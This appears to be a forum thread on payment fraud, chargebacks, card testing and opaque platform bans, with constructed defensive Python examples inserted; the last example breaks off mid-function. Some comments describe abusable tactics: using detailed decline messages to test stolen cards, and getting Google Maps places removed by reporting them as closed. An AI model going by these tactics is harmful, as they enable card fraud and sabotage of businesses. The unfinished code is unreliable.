1) The basics: track all information entered in the signup process and display it in a signup email to our customer service/onboarding rep, along with whether and how often each piece of info was used (or was similar) in past locked/disabled-for-fraud accounts and have a human determine via eyeball if the composite picture looked like fraud. You’ll be surprised how often a customer saying his name was Ibrahim with a phone number in Egypt had an IP in Jordan and was using a credit card belonging to Sally Jones with a zip code in Kansas. Don’t automate fraud decision. Have a human in the loop. Know your customers with a human touch up front at signup. (“Do things that don’t scale” is the more recent mantra for this approach.) But never emit info, so fraudsters couldn’t game the system beyond the binary of getting enabled/disabled, and even then don’t give them immediate feedback during/post signup to run permutations quickly. Have a human vet asynchronously shortly post-signup as part of customer welcome/orientation call.
2) Silently partially disable international customers so they could sign up and give us info and do certain things but not really generate expensive transactions until a customer rep called and welcomed/vetted them and checked a box unrestricting them in our admin panel. (I say silently but if they actually got to the final step of a transaction, we did give them ways to reach out to us to get activated after talking to someone (which was manned 24x7). 99+% of the time, fraudsters never called/reached out.)
3) Most subtly, reps especially offshore ones from white label partners of ours were slow to use our ways to vet their (and thus our) customers even though their management was pushing our development team for more and more technical solutions to cut fraud. It was frustrating because I could see the fraud and it was a massive chunk of our partner’s revenue (1/3rd?) shortly out of the gate with us, but since they were a white label customer of ours I/we couldn’t exactly tell their lower level rep employees to get off their butts and take the fraud seriously (when even their management wasn’t getting through), nor did I want it to continue to harm their business because it would also harm ours.
Remembering the mantra “you can’t manage what you don’t measure”, I built an admin screen that their reps (and thus their bosses) could see that showed when each recent customer signed up and when they were cleared or locked out as fraud, how many minutes were between the two and who (which rep) locked/cleared the customer and how much was spent (lost) before the account was locked. The difference was profound. Fraud from the white label partner’s customers dropped practically overnight, from $5000 a month to under $50 just by adding a report that quietly made the humans in the loop accountable. I didn’t even have to tell the partner’s people what to do. I just made the outcomes measurable and visible and the problem took care of itself. It was a profound lesson for me early in my career. I wish that exact trick had been more useful for me since, but still — very eye opening. Chargebacks were never a problem for us again.
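As an added example (not code from any commenter above), here is the "composite picture" review sheet from tactic 1 and the time-to-decision report from tactic 3 in one place. Every record is constructed sample data; the field names, the locked-account history and the report columns are assumptions, not anyone's real system. Note that `review_signals` decides nothing and emits nothing to the customer; it only prepares what the human in the loop looks at.

```python
from __future__ import annotations
from dataclasses import dataclass
from datetime import datetime

@dataclass(frozen=True)
class Signup:
    account_id: str
    name: str
    email: str
    phone: str            # E.164, as typed
    phone_country: str    # ISO 3166-1 alpha-2 derived from the dialling code
    ip: str
    ip_country: str       # from a GeoIP lookup
    card_name: str        # cardholder name as returned by the processor
    card_country: str     # issuer country from the BIN
    card_zip: str         # billing ZIP/postcode the customer typed
    card_fp: str          # processor's card fingerprint/token, never the PAN

# Constructed history: accounts a human already locked for fraud (assumed shape).
LOCKED_HISTORY = [
    {"email": "a.b@example.net", "phone": "+20105550100",
     "ip": "197.0.2.10", "card_fp": "fp_7a1c"},
    {"email": "c.d@example.org", "phone": "+15555550123",
     "ip": "203.0.113.8", "card_fp": "fp_99e0"},
]

def _norm(s: str) -> str:
    return " ".join(s.lower().split())

def review_signals(s: Signup, history=LOCKED_HISTORY) -> list[str]:
    """Build the composite picture for the onboarding rep. This never decides
    and nothing here is shown to the customer; the rep eyeballs the list."""
    signals: list[str] = []
    if _norm(s.name) != _norm(s.card_name):
        signals.append(f"signup name {s.name!r} != cardholder {s.card_name!r}")
    geo = {"phone": s.phone_country, "ip": s.ip_country, "card": s.card_country}
    if len(set(geo.values())) > 1:
        signals.append("geo mismatch: " + ", ".join(f"{k}={v}" for k, v in geo.items()))
    for key in ("email", "phone", "ip", "card_fp"):
        hits = sum(1 for h in history if h[key] == getattr(s, key))
        if hits:
            signals.append(f"{key} reused from {hits} previously locked account(s)")
    return signals

@dataclass(frozen=True)
class Decision:
    account_id: str
    rep: str
    signed_up: datetime
    decided: datetime
    outcome: str          # "cleared" or "locked"
    spent_before: float   # value transacted before the rep acted

def rep_report(decisions: list[Decision]) -> dict[str, dict]:
    """Per rep: accounts handled, average minutes from signup to decision,
    and money lost on accounts that were eventually locked."""
    out: dict[str, dict] = {}
    for d in decisions:
        r = out.setdefault(d.rep, {"accounts": 0, "locked": 0, "lost": 0.0, "_mins": []})
        r["accounts"] += 1
        r["_mins"].append((d.decided - d.signed_up).total_seconds() / 60)
        if d.outcome == "locked":
            r["locked"] += 1
            r["lost"] += d.spent_before
    for r in out.values():
        r["avg_minutes"] = round(sum(r["_mins"]) / len(r["_mins"]), 1)
        del r["_mins"]
    return out

# Constructed sample inputs.
SUSPICIOUS = Signup("acct-1", "Ibrahim K", "a.b@example.net", "+20105550100", "EG",
                    "41.0.0.5", "JO", "Sally Jones", "US", "66002", "fp_7a1c")
ORDINARY = Signup("acct-2", "Jane Doe", "jane@example.com", "+441632960960", "GB",
                  "81.2.69.160", "GB", "Jane Doe", "GB", "SW1A 1AA", "fp_0001")
DECISIONS = [
    Decision("acct-1", "rep-a", datetime(2009, 3, 1, 10, 0), datetime(2009, 3, 1, 10, 30), "locked", 120.0),
    Decision("acct-2", "rep-a", datetime(2009, 3, 1, 11, 0), datetime(2009, 3, 1, 11, 10), "cleared", 0.0),
    Decision("acct-3", "rep-b", datetime(2009, 3, 1, 9, 0), datetime(2009, 3, 2, 9, 0), "locked", 950.0),
]

if __name__ == "__main__":
    for sig in review_signals(SUSPICIOUS):
        print("REVIEW:", sig)
    print(review_signals(ORDINARY))
    for rep, row in rep_report(DECISIONS).items():
        print(rep, row)
```

The report deliberately keys on the rep, not the customer: the point of the original story is that making the minutes-to-decision and the money lost visible per person changed behaviour without any new detection logic.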
I’ve heard that a lot of Shopify sites will have the auto credit card processing disabled for new orders. So that a real person can validate the order before hitting Stripe or whoever with it. Fraud orders are usually easy to spot by shipping addresses and you can get a good sense for it pretty quickly. It isn’t quite chicken sexing!
Maybe the hot take here is that the best way to ruin your own business is to automate credit cards?
"Fraud orders are usually easy to spot by shipping addresses"
You can find some of these by searching the shipping address and seeing if it's a freight forwarder or an obviously vacant home (listed on MLS with empty room pictures). Those kinds of shipping addresses have pretty high fraud rates.
But, if you mean seeing that the shipping address doesn't match the billing address on the card via AVS... That's trickier, especially for B2B spaces where a business owner buys with a credit card tied to their home address, but ships to their business.
Here’s a question, if Stripe or PayPal for example are processing so many transactions why can’t they see this stuff coming a mile away?
Shouldn’t it be trivial to “triangulate” the origin of a card hack / leak after like, I don’t know, three or four transactions? This whole thing seems rigged to make small businesses liable for covering the cost of the PII failure of probably a banking institution, or at a minimum a completely different small business!
Reading so many of the comments in this thread just strengthens my belief that we need large platforms to be governed like utilities, or even better, open source alternative based utilities
I know it's probably downvoted as society has a sweet spot for pity, but to a certain extent it's OP's fault.
As a merchant, you need to have a proper anti-fraud system. Especially considering the influx of orders with stolen CCs. It's just necessary to avoid huge financial and reputational losses.
Don't rely on Shopify/Stripe "anti-fraud" - it's absolute garbage selling a feeling of security. Proper analysis of order flow, spotting irregularities across many datapoints, is needed.
Some may whine things are not fair - yes they are not, and never will be. You just need to adapt.
Let me guess, you think cloudflare is the devil, right?
This is happening because you are basically leaving your PoS system open and unattended while a scammer walks by with a wheelbarrow full of freshly stolen credit cards.
Throw a captcha on that checkout page at least for goodness sakes
Sidenote, I remember some people here wondering why websites don't explain why a transaction failed (wrong CVV, wrong AVS or Do not honor, etc...). This is what happens if you do give this kind of error through and don't put in some form of rate limiting, etc.. It becomes a convenient site for scammers to test stolen credit cards and you end up being flagged by your payment provider.
Also, it's worth having a relationship with a smaller payment gateway, merchant account provider. It insulates you somewhat.
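As an added example (not from any commenter here) of the two controls in the comment above, velocity limiting against card testing and a generic decline message that stops the checkout acting as a CVV/AVS oracle, plus the earlier comment's policy of 3DS only for new accounts. The log lines are constructed, and the thresholds, field layout and function names are assumptions for illustration.

```python
from __future__ import annotations
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample of checkout attempts (not real traffic).
# Fields: timestamp source_ip session card_fingerprint result processor_reason
SAMPLE_LOG = """\
2024-05-01T12:00:01Z 203.0.113.7 s1 fp_a1 declined incorrect_cvc
2024-05-01T12:00:04Z 203.0.113.7 s1 fp_a2 declined do_not_honor
2024-05-01T12:00:07Z 203.0.113.7 s1 fp_a3 declined incorrect_cvc
2024-05-01T12:00:09Z 203.0.113.7 s1 fp_a4 approved -
2024-05-01T12:00:12Z 203.0.113.7 s1 fp_a5 declined avs_mismatch
2024-05-01T12:00:15Z 203.0.113.7 s1 fp_a6 declined incorrect_cvc
2024-05-01T12:03:00Z 198.51.100.2 s2 fp_b1 approved -
2024-05-01T12:05:00Z 198.51.100.3 s3 fp_c1 declined incorrect_cvc
2024-05-01T12:05:40Z 198.51.100.3 s3 fp_c1 approved -
"""

def parse_log(text: str) -> list[dict]:
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, session, card_fp, result, reason = line.split()
        events.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "ip": ip,
                       "session": session, "card_fp": card_fp,
                       "result": result, "reason": reason})
    return events

def detect_card_testing(events, window=timedelta(minutes=10),
                        max_cards=4, max_declines=3) -> dict:
    """Sliding window per source IP (thresholds assumed). A source that cycles
    through many distinct cards, or piles up declines, is a card tester; one
    shopper retrying a mistyped CVC once is not."""
    recent: dict[str, deque] = defaultdict(deque)
    flagged: dict[str, dict] = {}
    for e in sorted(events, key=lambda x: x["ts"]):
        q = recent[e["ip"]]
        q.append(e)
        while e["ts"] - q[0]["ts"] > window:
            q.popleft()
        cards = {x["card_fp"] for x in q}
        declines = sum(1 for x in q if x["result"] == "declined")
        if e["ip"] not in flagged and (len(cards) >= max_cards or declines >= max_declines):
            flagged[e["ip"]] = {"at": e["ts"], "distinct_cards": len(cards),
                                "declines": declines}
    return flagged

GENERIC_DECLINE = ("We couldn't complete this payment. "
                   "Please try another payment method or contact us.")

def customer_message(reason: str, ops_log: list[str]) -> str:
    """Keep the precise processor reason for ops; the browser gets one generic
    string, so 'wrong CVV' vs 'wrong AVS' is never leaked to a card tester."""
    ops_log.append(reason)
    return GENERIC_DECLINE

def step_up_required(ip: str, flagged: dict, prior_successful_orders: int) -> bool:
    """Captcha/3DS for flagged sources and first-time buyers; repeat customers
    are left alone."""
    return ip in flagged or prior_successful_orders == 0

if __name__ == "__main__":
    events = parse_log(SAMPLE_LOG)
    flagged = detect_card_testing(events)
    for ip, info in flagged.items():
        print(f"card testing from {ip}: {info}")
    ops: list[str] = []
    for e in events:
        if e["result"] == "declined":
            customer_message(e["reason"], ops)
    print("customer sees:", GENERIC_DECLINE)
    print("ops sees:", ops)
    print("step-up for new buyer:", step_up_required("198.51.100.3", flagged, 0))
```

The window is keyed on source IP for brevity; in practice you would also key on session or device fingerprint, because testers rotate proxies but rarely rotate the browser session mid-run.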
I'm unable to log in to my paypal account, because the confirmation sms never arrives, and the only contact given is to call them. Guess I’ll never use paypal again.
I just wish there was adversarial integration on these payment apps. I'm tired of setting up new ones.
Imagine if our phones still worked like they originally did, where you could only call other people on the same carrier you are on. Oh you have T-mobile? Sorry. I have AT&T, i will write you a letter.
We didn't put up with it back then, and we shouldn't put up with it now.
I’m not a crypto evangelist by any means but one thing that I like about crypto is there are no chargebacks. I added coinbase and it’s not a huge amount but about 5% of sales go over this. Apple/meta/amazon pay are also somewhat alternatives because the payment is going through a device that can be physically stolen but harder to do fraud than a virtual credit card.
I view it as paying by cash, so the same type of pitfalls exist. I'm not really pushing crypto as the best payment method, just giving the OP possible alternative payment methods they could use. There is a learning curve to using crypto, which I believe reduces the potential of consumers not fully understanding the risk of sending payments. Consumers who want the protections should use a credit card to get those.
Coinbase could freeze your ability to process or receive your payments for a dozen random reasons too. False sense of security there, you need self custody.
Have open source self custody merchant tools improved?
Brick and mortar gone online and Web 2.0 services seem pretty left behind for accepting crypto payment. And Web 3’s crypto natives don't care or need purchasing flows.
I wonder what it is that we do differently such that I never hear of these problems from natively European payment methods. E.g. the payment platform iDeal draws directly from your bank account but there is apparently no significant trade in stolen logins. What makes that not as lucrative?
Related, but not strictly the same: a week ago my IBAN (eu-wide bank account number) was used via a Paypal guest account to make payments of 580€, paying through direct debit (Lastschrift).
There is no inherent security at all. Merchants usually send you 1 cent with a 2fa code, in order to verify that you have access to the account.
In my case this was not done apparently, and the scammers got their items. I was able to do something similar to a charge back, but I wonder whether the online store or PayPal will have to eat the loss.
I read about stuff like this every month, but then people (on the internet) tell me there are no uses for blockchains and they're exclusively for scams (yes, scams exist, a lot of them).
Try talking to a local (office close-ish to you) processor or acquirer. You usually need a good amount of transactions to get them interested, but they will have support, they will discuss before taking any measures etc.
In many countries you have a cheap, easy to implement and fast bank to bank for online which is faster, cheaper and more secure. And as such, mostly impossible to chargeback because unless you had a gun to your head, it was you who did the transaction.
In those regions, incentivise those means; give 5% discount for paying like that. We accept those in region where they are available, we also have our IBAN for you to pay directly. Some companies prefer that as they pay all their other invoices that way.
It would be relatively easy to implement in Ireland, but I've only used it once (buying from a shop in Germany). I placed the order on their website, and they gave me an IBAN and a reference number. I did a bank transfer to that account using the reference number they gave me, and they marked the invoice as paid and shipped the product. Simple system, though I'm not sure how they monitored their bank account: it may have been manual. It would work for any company which uses IBANs, which is all SEPA companies and many more besides.
Australia has a system called POLi. This injects a popup into the checkout page of a website which allows you to log into your own bank and do a transfer from there. That works well, and seems quick and easy for the customer.
> as a solo SaaS builder it seems harder and harder these days to have any sort of job security
This overlooks the hard work and risk undertook by the virtuous founders of Paypal and Stripe.
*SBOs love to advocate the virtues of "risk-taking" to defend exploiting others, and the opposite when they find themselves at the other end of the exploitation.
> There's no way of getting this ban reversed, there's no way of invoking any human to perform a manual review on the ban. It is a permanent restriction that impacts her ability to communicate with her customer base.
You know you're doing it wrong when the Ministry of Information in the movie Brazil has better customer service than you do.
Edit: add "the movie" to remove ambiguity.
Getting lawyers involved is one guaranteed way to talk to a human at Facebook. It won't be easy or cheap though, so I can understand why a business like a flower shop wouldn't want to do that.
This is a political problem manifesting as a legal one.
Call your US Senators and Representative. Explain the problem.
Call your State Senators and Representative. Explain the problem.
Contact the FTC and file a complaint.
If you're based in Europe, try framing it as a GDPR issue. Article 16 says that data processors have to rectify data that is inaccurate or incomplete within 1 month. If they don't do that, you can raise it to your national privacy ombudsman as an incident. This being Facebook, there is a chance that they'll act on it.
Be sure to CC privacy@facebook.com and legal@facebook.com
Only issue: not sure that the GDPR applies to companies. And it's a 'pro' account I guess?
Sorry to hear this. Floristry is pretty cut throat with all the shipped direct sites that undercut prices. (Used to work at FTD.com, which bought ProFlowers, a very large flowers-in-a box operation.}
> I sincerely hope that the next round of EU laws tackles this instead of privacy. It's just as big an issue, especially if you're running a small business.
This! Couldn't agree more. I believe this is a much bigger, huge problem compared to privacy, which is preventable (users can choose not to use a service) but this can take down entire businesses because of data giants' crappy/false alerting systems.
It should be illegal for Google, say, to remove listing without proving, or if that's not possible, if they remove they should legally be forced to compensate for the damage done. (Of course Google is just an example here, applies to any large enough platform)
Maybe then they will take this seriously.
> users can choose not to use a service
By that logic you can just not use Google. But that's ridiculous, as ridiculous as the statement that users can choose not to use a service. I believe it's impossible to live in modern society without having an account in FAANG, even harder than a business not having a google maps listing.
Privacy is a choice? That's a new one, I didn't know people had the choice of their data not being leaked or sold by small and big businesses.
We can chew gum and walk at the same time, no need to throw privacy under the bus.
Given that Google handles a tremendous amount of email (not all to gmail.com domains either), and that other companies maintain "shadow profiles" of non-members, or simply track vast numbers of people (credit bureaux and other data-brokers), let alone the vast levels of surveillance baked into the present-day Internet, saying people can simply opt out of services is ... profoundly untrue.
There's no need to pit fairness in business dealings against privacy. Both are wins for the average person.
The problem is that such large platforms work like utilities, but are governed as services
I really am in favor of your suggestion. Next to that my stance is that big companies should by law be required to have a human representative you can contact, especially in the time of AI.
But then we will face the original problem: prevalence of fake location spam
> I sincerely hope that the next round of EU laws tackles this instead of privacy. It's just as big an issue, especially if you're running a small business.
At least in Germany, you can file for a court order ("Einstweilige Verfügung") against Google - that usually works out and is relatively cheap, a couple hundred euros. Consult a lawyer, I think most EU countries have a similar instrument. Do note, you might have to file for an order both against the Google Europe HQ in Dublin/Ireland and against your country's Google office.
How would this work? Google isn't an official registry, do they have an obligation to list any business?
And the privacy argument is often effectively countered with security concerns, even more so if that is expressly stated so in the ToS.
Just to be clear: I'm 100% on the GP's side, I'm just curious what the Verfügung could do here. In order for the court issue such an order, it needs at least a reasonable legal basis.
Even if you dont want to be listed on google maps, they will sometimes generate a fake listing for you anyhow. I got burned by one of these as a customer, the link for takeout was not actually a site the restaurant was partnered with. I’ve also seen restaurants with similar names url squat these other places.
It seems so bizarre google will publish such information without ever validating it with the business. It must cause a lot of damage and support quite the environment of scammers though.
This happened to a restaurant I go to a lot. Their Maps listing said there was online ordering, but the link went to a site that even had a disclaimer saying they were not actually affiliated with the restaurant. I reported it to Google and they removed the entry, but anyone can make a change and double checking seems to be cursory at best.
> It seems so bizzare google will publish such information without ever validating it with the business.
Why should they? Validation would be expensive, and the false information doesn't hurt Google. Where else are you gonna list?
On the flip side, as an avid Google Maps reviewer they also removed my negative review from a restaurant without any good reason (supposedly the business reported it as being “fake” or something)
It really pissed me off because I wrote a long thoughtful review and mentioned the good aspects of the restaurant too as well as some recommendations, and it’s just completely gone
The worst part is the restaurant is sitting at 4.5 stars despite being quite bad, and the recent low star reviews are all questioning the rating, which is obviously artificial
I've been reading a lot of reports recently about how businesses abuse AirBnb and Google Maps reviews by forcing the companies to remove them on technicalities or by outright lies. I wonder if I should just post any less-than-stellar reviews without any text but with rating only in order to make it harder for them to remove. Thoughts?
I’m at Level 8, how far along are you?
If that happened recently enough, I would guess that your "long thoughtful review" was confused for a ChatGPT fake.
This is also a problem on the customer side. I don’t shy away from leaving bad reviews to businesses that deserve it. These businesses either reply with a passive aggressive doxx like “Hi Or Nornor” when I don’t use my real name anywhere on the internets (including medical-related businesses), or they report the review and my account gets blocked with all my reviews removed.
And then of course there isn't a single living human at google you can contact to even find out which review was flagged, why, and what to do about it.
I don’t even read reviews anywhere anymore, they’re all faked or AstroTurfed anyway that they give no indication of anything. What a brave new world.
I encountered the same problem recently. My family member’s business changed location. Updating the Google maps listing caused Google to flag it for not following guidelines and weeks passed with the listing being “under review”.
The solution that ended up working for me was to start paying a few dollars a day for Adwords. For some reason that cleared the issue up the next day. Then, I turned AdWords down to a few bucks a week and then later off entirely.
> The solution that ended up working for me was to start paying a few dollars a day for Adwords. For some reason that cleared the issue up the next day.
Yes, for some reason it cleared up after spending money. I really hope it’s not the norm. Sounds like extortion to me.
Can confirm. This works in more places than one, Reddit too. Reason? When you're a paying customer, you get routed to elevated support staff. They have a higher incentive to help you fix the problem and fast.
I don't hate it, I appreciate it. Better than having no easy recourse. Because I bet if everyone were treated equally, it'd be shitty service for all. Better to toss in a few bucks if it's valuable and get the support (and some ads run).
This sounds like an Mafia movie. Pay up for a little protection and don't let it happen again!
Intentionally or accidentally, it's a great problem for big tech to have. You scramble with everybody else to be on the service and the DDOS crowd, confused tourists and local ruffians take your account offline. Better grovel up to reinstate your honour and pay for protection/added services/more identity validation that doesn't stop the problem from happening. Same thing every big country does, we are all under a "security umbrella".
Honestly, real life advertising needs to make a come back. And localized knowledge of the businesses worth keeping alive, when Google's security algorithm dumps them without administration even knowing it. Eggs all in one basket, was never a good idea.. right?
All business and all government eventually become a racket.
Also, how should a small business deal with fake negative reviews in, say, Play Store? Google does nothing to fix that. As the app developer you know a review from an account that didn't sign-up to your service is fake, especially when it appears at the same time other similar fake reviews do.
This is very sad. It's a disgrace that even physical businesses today depend so much on Google.
If you happen to review a few places on Google Maps you are holding superpowers. Idk if that works for new accounts too. But yeah, at least if you do some activity and then report a place as closed, they are "checking" it for 1h, then you get the e-mail that the place got removed from Maps.
I use that for good purpose - I fix a lot of invalid information on Google Maps around my home town, and they apply the changes without batting an eye. This is good for society. But I can clearly see how that could be used for abusive purposes.
Companies that don't provide their customers with an easy way to speak with a representative shouldn't be allowed to operate inside the EU.
I feel like you should be able to request a call from their call center rather than be forced to wait on the phone for one. The long wait times to speak to representatives are a cost savings measure.
First saving on having to hire an appropriate level of customer service staff. Second that percentage of people who give up.
It's a feature, not a bug.
I think one of the Pixel phones had an option to detect when there was a human on the other end of the line. Definitely made me consider getting it back when I was looking for a new phone.
>I sincerely hope that the next round of EU laws tackles this instead of privacy
why instead?
Well because there's already been a lot of laws passed in that regard and there's already momentum. I don't mean they should stop this momentum, these privacy laws are incredibly important.
I meant the need to start a new front.
Because privacy laws have zero teeth and workarounds are technically easy (or endlessly annoying for zero new outcome, e.g. see cookie popups). If the EU actually enforced GDPR it would be amazing.
Meanwhile these companies who have essentially become a public utility don’t provide customer support or explanations.
Is it listed on OSM?
If it's not, you're part of the problem.
Yes of course it is. I put it on both on the same day.
Your comment feels very passive aggressive, FYI. There's no need to make accusations like that.
You get bad service from these companies for the same reason the government generally provides bad service: they are monopolies with no reason to spend more money to improve.
I worry about the horrible side effects that would occur from trying to grant that wish. It is always easy to make demands when you aren't the one carrying them out and most people don't think the implications through.
My mind just boggles at the implicit additional bureaucracy, expenses, and slowdowns being cheered for. The kind of mess which results in a system so complex that it has its own "degrees which shouldn't exist" spawned from it like medical billing.
Feel free to post a link or add it to your profile and I'll leave a good review.
Thank you, that's very kind. However, it's not possible even for me to view the listing while it is blocked.
You can blame the evil competitor but the real problem is that credit cards are not the right tool for payments to strangers over the internet.
Every time I do a CC transaction I’m giving a stranger exactly the information they need to do an entirely different, arbitrarily large CC transaction in my name with any merchant. That’s bonkers.
I’ve recently seen more use of Apple Pay via websites. Assuming it works as Apple Pay usually does, this at least is technically more secure (though I don’t like giving Apple more power) since it’s basically an exchange of cryptographically secure/verifiable one time tokens.
PayPal is no one’s favorite but at least if you use that you’re not handing over your CC number. (And yet they seem to lock out tons of merchants, hmm)
Why are we still using credit cards? It’s not great as a consumer either - I have had my card locked for traveling within the same city and spending maybe $20 at a merchant I don’t usually visit. I had it locked because of a $5 web service monthly charge - and I had verified the same charge the two prior months.
> Every time I do a CC transaction I’m giving a stranger exactly the information they need to do an entirely different, arbitrarily large CC transaction in my name with any merchant. That’s bonkers.
You may be surprised to know that, when doing a "conventional" CC transaction, you are most certainly not giving any stranger information that would allow them to perform a transaction in your name on another merchant. What you are doing is providing your card information to a PSP (payment service provider) that has been contracted by the merchant and will provide the merchant with a token with which the merchant can trigger a charge request to your card but only to their own pre-approved acquirer account. The merchant can do nothing else with these tokens.
A breach of the merchant's token database would be embarrassing but harmless. A breach of the PSP's database of card numbers would be bad and inconvenient for the cardholders, sure, but it would be a business-terminating event for the PSP as its PCI DSS [0] compliance would be shattered and it would be unable to operate again.
In summary, ordinary card payments are essentially as secure as Apple Pay. The only difference is that in one case you are trusting a gigatech brand which is very saliently involved in the process but whose side-business in payments has only operated since 2014, while in the other case you are trusting businesses that you may or may not have ever heard of —Adyen? Braintree? WePay? Worldline?— but that have probably been dealing with secure payment processing as their primary or only business for much longer.
[0] https://en.wikipedia.org/wiki/Payment_Card_Industry_Data_Sec...
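A constructed simulation of the token flow this comment describes: the PSP alone stores card numbers and issues each merchant tokens bound to that merchant's own account. This is an added example, not any PSP's real API; every name, field and value (including the Luhn check) is invented for illustration.

```python
"""Constructed simulation of the merchant-scoped card tokens described above.
Added illustration only: this is not any PSP's real API, and every name,
field and value here is invented."""
import secrets


def luhn_ok(pan: str) -> bool:
    """Luhn check used by card numbers (ISO/IEC 7812); rejects typos early."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:          # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


class PSPVault:
    """Models the PSP: the only party that stores PANs (the PCI DSS-scoped
    store). It hands merchants tokens bound to the merchant that requested
    them, and charges settle only into that merchant's own acquirer account."""

    def __init__(self):
        self._tokens = {}   # token -> (merchant_id, pan); invented structure
        self.settled = []   # (merchant_id, last4, amount) for each charge

    def tokenize(self, merchant_id: str, pan: str) -> str:
        """Reached by the cardholder's browser via the PSP's own form or iframe,
        so the merchant's servers never see the PAN, only the returned token."""
        if not (pan.isdigit() and 12 <= len(pan) <= 19 and luhn_ok(pan)):
            raise ValueError("malformed card number")
        token = "tok_" + secrets.token_urlsafe(18)  # random; carries no PAN bits
        self._tokens[token] = (merchant_id, pan)
        return token

    def charge(self, merchant_id: str, token: str, amount: int) -> bool:
        """A merchant's charge request. Succeeds only for the merchant the token
        was issued to, so a token copied out of merchant A's database is
        useless to anyone presenting it as merchant B."""
        entry = self._tokens.get(token)
        if entry is None or entry[0] != merchant_id or amount <= 0:
            return False
        bound_merchant, pan = entry
        self.settled.append((bound_merchant, pan[-4:], amount))
        return True


def breach_scenario() -> dict:
    """Merchant A's token table leaks. Returns what the leaked token can and
    cannot do, using a constructed test card number."""
    psp = PSPVault()
    test_pan = "4111111111111111"   # well-known test number, not a real card
    token = psp.tokenize("merchant_A", test_pan)
    return {
        "token_contains_pan": test_pan in token,
        "owner_can_charge": psp.charge("merchant_A", token, 1999),
        "thief_can_charge": psp.charge("merchant_B", token, 1999),
        "forged_token_works": psp.charge("merchant_A", "tok_made_up", 1999),
        "settled": psp.settled,
    }
```

The binding property only holds when the card data goes straight to the PSP (its hosted form or iframe); a checkout page that handles the PAN itself is outside this model.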
I think you missed the “over the internet” part. When you do a CC transaction over the internet, you give the merchant your CC number and all the other information needed to make a transaction happen. A legitimate merchant may pass that information directly to a PSP, but you can’t deny you’ve given the merchant the information. Surely you’ve filled out a CC form in a website before?
What prevents me from cloning some product's website and changing the payment form to send me the details instead, which I then submit somewhere else to purchase something online for myself? Not sure why Stripe or PCI is even important here.
(IMO) what GP was arguing for is that we should have a fundamentally asymmetrical form of payment, viz. the information I give for one purchase should not be able to be reused for another purchase, like a one-time token. Imagine if you had to send your private key every time you wanted to purchase something in crypto, for example.
This is correct and the GP is (confidently) talking nonsense.
However the big issue is most normal users would not have the ability to see if they're using an embedded iframe or cross origin JS from Stripe, Braintree, etc.
> You may be surprised to know that, when doing a "conventional" CC transaction, you are most certainly not giving any stranger information that would allow them to perform a transaction in your name on another merchant.
No. In the best case, you’re giving your payment details to a PSP. A couple of years ago NewEgg had a JavaScript skimmer on their checkout page that harvested all their customers' payment details for months. Obviously anyone with access and intent could do the same for any payment page.
I've used plumbers and dentists where, over the phone, they collect your CC information, sometimes as a deposit before doing work.
Always made me nervous... are they writing it down? Typing it into their home-made software?
> I have had my card locked for traveling within the same city and spending maybe $20 at a merchant I don’t usually visit. I had it locked because of a $5 web service monthly charge - and I had verified the same charge the two prior months.
This happens to me almost every time Skype bills me, and I've been a customer for probably 10+ years with both my bank and Skype, and the billing is regular as clockwork. For at least half of that time, I've complained about it vocally and customer service can't do anything. Now I think about this every single time I hear "AI-assisted fraud detection", and by extension, "AI-assisted security" and really "AI-assisted XYZ". Without another credit card, I guess I'd simply live in constant fear of being embarrassingly declined totally at random on any/every transaction. It's not like *I* know the billing cadence, even though my bank has a decade of history.
Clearly they are simply selling my history to the highest bidder, because they certainly aren't using it to help me. On a related note, ever notice that vanilla "exact substring match" search even in Gmail is just as bad as Google web search? All these corporations that are allegedly indexing us to "value-add" with some perfect high-resolution consumer model can't even do basic shit despite all the spying. I almost *expect* my privacy to be fucked, like I guess hey that's modernity. What never ceases to surprise me lately is how the pretense has kind of dropped and we get nothing in exchange, even petty conveniences.
> This happens to me almost every time Skype bills me, and I've been a customer for probably 10+ years with both my bank and Skype
Why are you still with that bank? Even if you like everything else about them, couldn't you just open an account with another bank for Skype billing? Having more than one account is helpful anyway for avoiding having a single point of failure where you can't buy anything.
Unfortunately we didn't use the contactless change to finally fix this. NFC payments are still stuck in the world where the client doesn't have a way to make the payment themselves so has to trust the payment terminal the merchant puts in front of him with their secret information. The transaction should have been reversed. The merchant should have the dumb side, where they only communicate payment details, and the client's phone should be the one doing verifications and initiating the payment. It's bonkers that this hasn't become standard yet. Even more bonkers that internet payments didn't make the same switch long ago.
At least in this respect the now prevalent UPI (unified payments interface) used throughout India fares better.
Each merchant -- even a roadside vendor or a mobile hawker of wares -- displays a QR code that has their payment account details / UPI handle.
The customer uses their own phone and UPI payment app to scan that QR code, look at the merchant details displayed, punch in the amount to pay and authorize the payment using their PIN.
(A variation on this is: hand-held POS terminals display a QR code that also encodes the amount to be paid so that the customer doesn't have to punch in the exact amount.)
And since this is a unified protocol the users are not stuck with a single payment app or a single payments processor or a single bank network to transact with each other. QR codes are universal - they can be scanned by any UPI app.
I have other reservations about the digital trail this leaves for every petty transaction of your life -- and the small risk of a petty vendor being able to harass you later based on the information you leave in their records.
If we don't trust the government -- this makes us jittery about how much they can track you or even cripple your life by disabling a few key things that you need this all to work smoothly.
Those risks aside, this UPI system has been a boon to ease of transactions (without worrying about handling cash and change) across the country. Net positive with some scope for improving privacy protections.
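The payer-initiated flow this comment describes, and the earlier "one-time token" point about information that cannot be reused for another purchase, modeled as a constructed Python simulation: the merchant's QR carries only payee and amount, the payer's phone authorizes a single payment bound to a fresh nonce, and the bank rejects tampering and replay. This is an added example, not code from UPI, any bank or any payment app; the URI scheme, key handling and all names are invented.

```python
"""Constructed model of a payer-initiated QR payment, in the spirit of the UPI
flow described above. Added illustration only: not code from UPI, any bank or
any payment app; the QR scheme, key handling and all names are invented."""
import hashlib
import hmac
import json
import secrets
from typing import Optional
from urllib.parse import parse_qs, urlencode, urlparse


def build_merchant_qr(payee_handle: str, amount: Optional[int] = None) -> str:
    """Merchant side is deliberately dumb: the QR names the payee and, optionally,
    the amount (smallest currency unit). It holds no payer secrets."""
    params = {"pa": payee_handle}
    if amount is not None:
        params["am"] = str(amount)
    return "upi-demo://pay?" + urlencode(params)   # invented URI scheme


def parse_merchant_qr(qr: str) -> dict:
    """Payer's app decodes the QR and shows the result to the user first."""
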